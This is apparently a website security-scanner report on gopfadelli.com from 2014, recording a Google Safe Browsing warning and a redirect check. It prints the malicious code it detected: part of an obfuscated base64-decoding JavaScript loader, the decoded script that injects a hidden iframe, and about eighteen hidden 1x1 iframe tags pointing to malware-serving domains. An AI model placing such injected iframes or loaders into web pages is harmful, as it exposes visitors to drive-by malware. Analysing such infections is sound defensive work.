Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gopfadelli.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://gopfadelli.com/ | 200 OK Content-Length: 8965 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try { function tMRYHjBApUZT(ApHfq){var JFeMOnjgy="",sRfMA,MCwVsjpG,scAmU,rwjPf,FPyMpa,BitTDXxpnF,YlmVFp,HmXkK,UoeGzgTB;var DgUabM="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var qryDgSoA="";for(HmXkK=0;HmXkK<ApHfq.length;){rwjPf=DgUabM.indexOf(ApHfq.charAt(HmXkK++));FPyMpa=DgUabM.indexOf(ApHfq.charAt(HmXkK++));UoeGzgTB=tMRYHjBApUZT;BitTDXxpnF=DgUabM.indexOf(ApHfq.charAt(HmXkK++));YlmVFp=DgUabM.indexOf(ApHfq.charAt(HmXkK++));sR ...[899 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://klaunfickeninarsh.com' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://klaunfickeninarsh.com');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0 ...[862 bytes skipped]... Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://eyjjtyjwergfdykdkdegh.cz.cc/main.php?page=cec4cd9031f6454b <iframe src="http://eyjjtyjwergfdykdkdegh.cz.cc/main.php?page=cec4cd9031f6454b" width="1" height="1" frameborder="0"> Hidden iFrame found. size: 1x1 src: http://sparkspk.com/les/index.php <iframe src="http://sparkspk.com/les/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. size: 1x1 src: http://videolasdes.com/ms/index.php <iframe src="http://videolasdes.com/ms/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. The same iFrame was found in 4 websites. size: 1x1 src: http://severcheck-avg.com/le/index.php <iframe src="http://severcheck-avg.com/le/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. The same iFrame was found in 12 websites. size: 1x1 src: http://arbeitvonzuahusaus.com/k/index.php <iframe src="http://arbeitvonzuahusaus.com/k/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. size: 1x1 src: http://busderaskon.com/nek/index.php <iframe src="http://busderaskon.com/nek/index.php" width="1" height="1" frameborder="0"> Malicious iFrame found. The same iFrame was found in 4 websites. size: 1x1 src: http://ladynaythamburg.com/b/index.php This URL is marked by Google as suspicious <iframe src="http://ladynaythamburg.com/b/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. The same iFrame was found in 6 websites. size: 1x1 src: http://jg54ikkhjdc.com/govinda.de/index.php <iframe src="http://jg54ikkhjdc.com/govinda.de/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. The same iFrame was found in 3 websites. size: 1x1 src: http://vzisf7g69gr.com/index.html <iframe src="http://vzisf7g69gr.com/index.html" width="1" height="1" frameborder="0"> Hidden iFrame found. size: 1x1 src: http://heskdo44se.com/hel/index.php <iframe src="http://heskdo44se.com/hel/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. The same iFrame was found in 4 websites. size: 1x1 src: http://artemworldks.com <iframe src="http://artemworldks.com" width="1" height="1" frameborder="0"> Hidden iFrame found. The same iFrame was found in 4 websites. size: 1x1 src: http://fickdeinenachbarin.com/b/index.php <iframe src="http://fickdeinenachbarin.com/b/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. size: 1x1 src: http://severnadobs.com/bd/index.php <iframe src="http://severnadobs.com/bd/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. The same iFrame was found in 3 websites. size: 1x1 src: http://sexxyladymasberlin.com/nu/index.php <iframe src="http://sexxyladymasberlin.com/nu/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. size: 1x1 src: http://best-heimarbeit.com/d/index.php <iframe src="http://best-heimarbeit.com/d/index.php" width="1" height="1" frameborder="0"> Hidden iFrame found. size: 1x1 src: http://hsuuue938dns.com/gs/dzxpdoiriv.php <iframe src="http://hsuuue938dns.com/gs/dzxpdoiriv.php" width="1" height="1" frameborder="0"> Hidden iFrame found. size: 1x1 src: http://lekorbashen.com/lola/index.php <iframe src="http://lekorbashen.com/lola/index.php" width="1" height="1" frameborder="0"> Malicious iFrame found. The same iFrame was found in 5 websites. size: 1x1 src: http://fs8g78f8dduf.com/puke.de/jnbnjoklioeoctgljvb.php This URL is marked by Google as suspicious <iframe src="http://fs8g78f8dduf.com/puke.de/jnbnjoklioeoctgljvb.php" width="1" height="1" frameborder="0"> | ||
http://gopfadelli.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gopfadelli.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 17 Apr 2014 05:19:09 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: gopfadelli.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 17 Apr 2014 05:19:09 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: gopfadelli.com
Referer: http://www.google.com/search?q=gopfadelli.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gopfadelli.com
Referer: http://www.google.com/search?q=gopfadelli.com
Result:
The result is similar to the first query. There are no suspicious redirects found.